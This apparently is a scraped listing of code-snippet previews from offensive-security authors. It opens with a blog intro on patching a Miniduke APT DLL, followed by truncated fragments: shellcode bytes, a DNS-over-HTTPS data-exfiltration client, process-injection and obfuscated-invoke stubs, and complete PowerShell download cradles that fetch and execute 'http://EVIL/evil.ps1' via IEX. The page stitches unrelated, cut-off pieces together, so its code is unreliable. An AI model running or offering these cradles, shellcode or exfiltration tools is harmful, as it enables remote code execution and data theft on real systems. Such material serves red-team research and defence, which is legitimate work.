ahm3dgg

Fixing an APT sample so it can work on Modern Windows versions - An Exercise in Reverse Engineering

Sample

I stumbled upon an old miniduke APT malware, and found that it has some cool tricks, while I won't be explaining how the malware works or what it even does, I will be focusing on showing a code flaw in the sample, that was the reason for a crash that I found while debugging it on Windows 10, as well as showing how we can fix it, that requires some amount of reverse engineering and coding (I will use C & Assembly).

But to give you a quick introduction, that sample comes as 32-bit DLL file, with one export with name 'JorPglt', which is the start of payload, the sample also employs few simple (code mutation / instruction-level obfuscations) that we will discuss as well.

So without getting into much details here is where the code flaw resides

ThePirateWhoSmellsOfSunflowers

import argparse
import datetime
import logging
import os
import random
import struct
import sys
from binascii import hexlify, unhexlify
from six import ensure_binary

whokilleddb

#include <windows.h>
#include <wininet.h>
#include <stdio.h>

#pragma comment(lib, "wininet.lib")

// notepad.exe shellcode
char shellcode[] =  {
    0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51,
    0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52,

daaximus

// author: daax

// 0x4a65 = 19045 (windows version)
int main()
{
    PSAPI_WORKING_SET_INFORMATION* w = ( PSAPI_WORKING_SET_INFORMATION* ) malloc( 1 << 20 );
    QueryWorkingSet( GetCurrentProcess(), w, 1 << 20 );
    for ( u32 i = 0; i < w->NumberOfEntries; i++ )
        if ( ( w->WorkingSetInfo[ i ].Flags & 31 ) == 4 )
            for ( u8* p = ( u8* ) ( ( w->WorkingSetInfo[ i ].Flags >> 12 ) << 12 ),

x86matthew

#include <stdio.h>
#include <windows.h>

#pragma comment(lib, "winmm.lib")

void Nothing(WORD wKey)
{
}

void PrintKey(WORD wKey)

0xHossam

#    Info: Stealthy Data Exfiltration Using (DoH) - Client Code
#    Date: May 26, 2024
#    Author: Hossam

import os, glob, requests, logging, struct, base64, random, time, httpx
from datetime import datetime
import urllib3
import win32com.client
from colorama import Fore, Style, init
from cryptography.fernet import Fernet

RistBS

#include <Windows.h>
#include <stdio.h>


#define PRINTDEBUG(fmt, ...) printf(fmt "\n", ##__VA_ARGS__)
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)

#define WORKER_FACTORY_FULL_ACCESS 0xf00ff 

typedef struct _UNICODE_STRING {

susMdT

using System;
using System.Runtime.CompilerServices;
using System.Reflection;
using System.Reflection.Emit;
namespace FunkyJit
{
    class Program
    {
        public static void Nothing() { Console.WriteLine(); }
        static void Main(string[] args)

dr4k0nia

using System.Linq;
using System.Reflection;

namespace HashInvoke;

public class HInvoke
{
    public static T InvokeMethod<T>(uint classID, uint methodID, object[]? args = null)
    {
        // Get the System assembly and go trough all its types hash their name

HarmJ0y

# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")

# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')

# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r

# Msxml2.XMLHTTP COM object